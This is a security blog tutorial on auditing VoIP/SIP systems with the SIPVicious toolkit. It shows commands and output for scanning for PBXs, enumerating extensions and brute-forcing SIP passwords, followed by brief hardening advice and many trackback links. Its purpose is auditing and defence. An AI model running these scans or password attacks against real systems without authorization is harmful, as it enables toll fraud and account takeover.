Hacking Exposed VoIP/SIP

VoIP systems becoming increasingly popular, attracted people are not only legitimate users that are looking to use it in their business but those who would like to make free calls at other people’s expense. SIP devices are often attacked, with the intent of finding the username/password of accounts on that device.

VoIP attacks are found over misconfiguration or problems while implementing the PBX system. For testing these vulnerabilities we can use SIPVicious which is a set of tools that can be used to audit SIP based VoIP systems. It consists of five tools:

  • svmap – this is a sip scanner. Lists SIP devices found on an IP range
  • svwar – identifies active extensions on a PBX
  • svcrack – an online password cracker for SIP PBX
  • svreport – manages sessions and exports reports to various formats
  • svcrash – attempts to stop unauthorized svwar and svcrack scans

This set of tools is written in Python and can be used on different operating systems. To better understand the way it works we can use the following scenarios:
– Running svmap to look for SIP phones:
box $ ./svmap.py 192.168.1.1/24
| SIP Device | User Agent |
——————————————————
| 192.168.1.111:5868 | Asterisk PBX |
| 192.168.1.112:5060 | unknown |
box $
Here we can find an Asterisk PBX server detected on 192.168.1.111.

– Running svwar with default options on the target Asterisk PBX, these accounts can be used for calling:
box $ ./svwar.py 192.168.1.111
| Extension | Authentication |
——————————
| 202 | reqauth |
| 203 | reqauth |
| 200 | reqauth |
| 201 | noauth |
 
box $
There are 4 extensions located, from 200 through 203 and 201 does not require authorization while the rest requires authorization.

– Using svcrack with the optimization enabled can help in discovering number based password as it just tries three-digit number combinations in order until it finds the password.
 
box $ ./svcrack.py 192.168.1.111 –u 201
| Extension | Password |
————————
| 201 | 201 |
box $

Password for extension 201 is 201, as shown above.  To see how the attack works we can use –vv as follows:  svcrack.py 192.168.1.111 –u 201 –vv .and the screen will display what combination it is trying.

– The cracker can also use a dictionary file full of possible passwords.
box $ ./svcrack.py 192.168.1.111 –u 203 \ -d dictionary.txt
| Extension | Password |
————————
| 203 | ascript |
box $

If you want to secure your VoIP/SIP, you need to start by setting the Firewall level to allow access for only a specific IP group and add the list of static IP addresses that are going to use the VoIP. If you are working remotely it will be also important to enable VPN for authenticating and encrypting your connection.

make sure you subscribe to my RSS feed!

Share
Subscribe
Notify of
guest
68 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback
trackback

#security Hacking Exposed VoIP/SIP: VoIP systems becoming increasingly popular, attracted people are no… http://bit.ly/mCAijE #infosec

trackback

Hacking Exposed VoIP/SIP: VoIP systems becoming increasingly popular, attracted people are not only legitimate u… http://bit.ly/mCAijE

trackback

Hacking Exposed VoIP/SIP: VoIP systems becoming increasingly popular, attracted people are not only legitimate u… http://bit.ly/mCAijE

trackback

#security Hacking Exposed VoIP/SIP http://dlvr.it/ScfYf #infosec

trackback

#security Hacking Exposed VoIP/SIP http://dlvr.it/ScfYN #infosec

trackback

#security Hacking Exposed VoIP/SIP http://dlvr.it/ScfYW #infosec

trackback

#security Hacking Exposed VoIP/SIP http://dlvr.it/ScfYd #infosec

trackback

Hacking Exposed #VoIP/#SIP: VoIP systems becoming increasingly popular, attracted people are… http://goo.gl/fb/WgRci

trackback

#Security #infosec Hacking Exposed VoIP/SIP: VoIP systems becoming increasingly popular, attracted people are no… http://bit.ly/mCAijE

trackback
trackback
trackback
trackback

Hacking Exposed VoIP/SIP http://bit.ly/mCAijE

trackback

RT @Sectechno: Hacking Exposed VoIP/SIP #SIP #Tech Hacking #VoIP #VPN http://t.co/Gnp71rK

trackback

Hacking Exposed VoIP/SIP: [sectechno.com] VoIP systems becoming increasingly popular, attracted people are not only… http://cybr.tk/SdsL5

trackback

Hacking Exposed VoIP/SIP: [sectechno.com] VoIP systems becoming increasingly popular, attracted people are not only… http://cybr.tk/SdsLJ

trackback

Hacking Exposed VoIP/SIP: [sectechno.com] VoIP systems becoming increasingly popular, attracted people are not only… http://cybr.tk/SdsLJ

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kCl6rU

trackback

RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @Sectechno: Hacking Exposed VoIP/SIP #SIP #Tech Hacking #VoIP #VPN http://t.co/Gnp71rK

trackback

RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @Hfuhs Hacking Exposed VoIP/SIP – http://fuhs.eu/65r

trackback

RT @Hfuhs: Hacking Exposed VoIP/SIP – http://fuhs.eu/65r #voip

trackback

RT @Hfuhs: Hacking Exposed VoIP/SIP – http://fuhs.eu/65r #voip

trackback

Hacking Exposed VoIP/SIP – http://fuhs.eu/65r

trackback

Hacking Exposed VoIP/SIP – http://fuhs.eu/65r

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

RT @udayrao1010: RT @sectechno: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK #security #infosec

trackback

Hacking Exposed VoIP/SIP https://www.sectechno.com/2011/05/23/hacking-exposed-voipsip/ #security #infosec #voip #hacking

trackback

Hacking Exposed VoIP/SIP https://www.sectechno.com/2011/05/23/hacking-exposed-voipsip/ #seguridad #infosec #hacking #voip

trackback

Hacking Exposed VoIP/SIP howto – https://www.sectechno.com/2011/05/23/hacking-exposed-voipsip/ #VoIP

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK Tools written in Python

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK Tools written in Python

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip

trackback

RT @stalkr_: Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://bit.ly/iOCRjo by @sandrogauci #python #voip

trackback

Hacking Exposed VoIP/SIP http://bit.ly/kjt0FK using SIPvicious http://code.google.com/p/sipvicious/ by @sandrogauci #python #voip